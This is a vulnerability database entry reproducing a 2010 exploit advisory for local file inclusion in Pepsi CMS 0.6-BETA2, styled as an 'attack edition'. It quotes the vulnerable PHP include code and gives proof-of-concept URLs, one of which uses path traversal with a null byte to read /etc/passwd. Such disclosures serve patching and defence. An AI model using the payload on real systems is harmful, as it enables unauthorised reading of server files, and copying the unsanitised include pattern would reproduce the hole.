Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability

2010-03-31T00:00:00
ID SSV:19378
Type seebug
Reporter Root
Modified 2010-03-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ########################################################
    Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability
########################################################
 
    fucking the Web Apps [LFI #1 - attack edition
 
[+]Software:    Pepsi CMS (Irmin CMS)
[+]Version: pepsi-0.6-BETA2
[+]License: GNU/GPL
[+]Source:  http://sourceforge.net/projects/pepsicms/files/
[+]Risk:        High
[+]CWE:     CWE-22
[+]Local:       Yes
[+]Remote:  No
 
########################################################
 
[!] Discovered :    eidelweiss
[!] Contact :   eidelweiss[at]cyberservices[dot]com
[!] Thank`s :   sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
[!] Special To :    JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
 
########################################################
 
-=[Description]=-
 
    IrminCMS is a CMS (Content Management System) extensible and secure written in php
    Pepsi CMS is become of IrminCMS.
 
 
-=[ Vuln c0de ]=-
###############
    {index.php}
###############
 
<?php
if(!file_exists(".lock")) {
    $f = fopen(".basepath", "w");
    fwrite($f, "<?php define('BASEPATH', '".$_SERVER['DOCUMENT_ROOT']."'); ?>");
    fclose($f);
    fclose(fopen(".lock", "w"));
}
 
include (".basepath");
include ("config.php");
 
//very sweet
include "includes/template-loader.php";
 
 
 
###############
    {includes/template-loader.php}
###############
 
    include( 'config.php' );
    include( 'db.php' );
    //include( 'classes/theme_engine/engine.php' );
    include( $_Root_Path . 'classes/Smarty.class.php' );
 
########################################################
 
-=[ P0C ]=-
 
    Http://127.0.0.1/PATH/index.php?w=[LFI%]
 
    Http://127.0.0.1/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00
 
     
########################################################